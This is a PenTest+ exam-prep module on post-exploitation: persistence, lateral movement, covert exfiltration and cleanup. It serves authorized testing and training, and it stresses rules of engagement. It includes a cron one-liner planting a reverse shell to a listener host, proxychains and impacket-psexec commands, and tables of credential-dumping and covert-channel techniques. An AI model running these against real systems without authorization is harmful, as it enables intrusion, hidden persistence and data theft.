CompTIA PenTest+ (PT0-003): Post-exploitation and Lateral Movement

Table of Contents
Click Here to Return To the CompTIA PenTest+ Course Page
Post-exploitation and Lateral Movement is 14% of the CompTIA PenTest+ (PT0-003) exam. This module covers what you do after the first foothold: hold access, move deeper, steal data safely, and clean up. The first shell is rarely the goal. The real value is showing how far an attacker can go from one weak point.
You take the access you earned in attacks and exploits and demonstrate real business impact. A single compromised workstation that leads to domain admin and the customer database is a far stronger finding than a list of unpatched servers.
Persistence
Persistence keeps your access alive after a reboot, a logout, or a patch. You demonstrate it so the client understands how an attacker stays in even after the initial hole is closed.
| Technique | How it persists |
|---|---|
| Scheduled tasks / cron jobs | Re-run your payload on a timer |
| New accounts | A backdoor user you control |
| Registry keys | Run keys that launch on Windows startup |
| Reverse and bind shells | Call-back or listening shells for re-entry |
| C2 frameworks | Command-and-control beacons like Sliver or Cobalt Strike |
| Rootkits and backdoors | Deeply hidden, persistent access |
You add a Linux cron job that calls back every five minutes:
(crontab -l 2>/dev/null; echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'") | crontab -
Document every persistence mechanism you create. You remove all of them during cleanup.
Lateral Movement
Lateral movement is how you spread from your first host to the rest of the network. You pivot through a compromised host to reach systems you could not touch directly, dump credentials, and discover new services across SMB, RDP, SSH, LDAP, and RPC.
You tunnel your tools through a compromised host with Proxychains and a dynamic SSH tunnel:
ssh -D 1080 user@10.0.0.5
proxychains nmap -sT -Pn 10.0.1.0/24
You execute commands across Windows hosts with Impacket’s psexec:
impacket-psexec domain/user:password@10.0.1.20
| Tool | Lateral movement use |
|---|---|
| LOLBins | Built-in tools to blend in |
| CrackMapExec | Spray credentials across many hosts |
| Impacket | psexec, wmiexec, secretsdump |
| Netcat | Relays and simple shells |
| sshuttle | Transparent VPN-like pivoting over SSH |
| Proxychains | Route any tool through a proxy or tunnel |
| Metasploit | Routing, pivoting, and post modules |
| PsExec | Remote execution on Windows |
| Mimikatz | Credential reuse for pass-the-hash |
Staging and Exfiltration
Staging collects the data you want in one place, then exfiltration moves it out without tripping alarms. You demonstrate the data theft an attacker would perform, using file encryption to protect what you move and covert channels to hide it.
| Covert channel | How it hides data |
|---|---|
| DNS | Encode data in DNS queries |
| ICMP | Smuggle data inside ping packets |
| HTTPS | Blend exfil traffic into normal web traffic |
You also cover steganography, hiding data inside images or files, and cloud storage as a drop point. Only exfiltrate test data or approved files, never real customer records beyond what the rules of engagement allow.
Cleanup and Restoration
A professional leaves the environment as they found it. Cleanup and restoration is an ethical and contractual requirement, not an afterthought.
- Remove every persistence mechanism you created
- Revert configuration changes back to the original state
- Remove tools, payloads, and scripts you uploaded
- Preserve artifacts and logs needed for the report
- Perform secure data destruction of any client data you collected
You keep a running log of every change you make so cleanup is complete and verifiable. A leftover backdoor account is a finding against you, and it can become a real attacker’s entry point.
Next Steps
You finished the technical phases. Fold these results into the report you planned in Engagement Management , where the attack narrative ties your foothold, lateral movement, and impact into one story for the client. Review Attacks and Exploits to strengthen your initial access skills, and return to the CompTIA PenTest+ Course to finish the path. Before exam day, read tips for passing CompTIA exams .

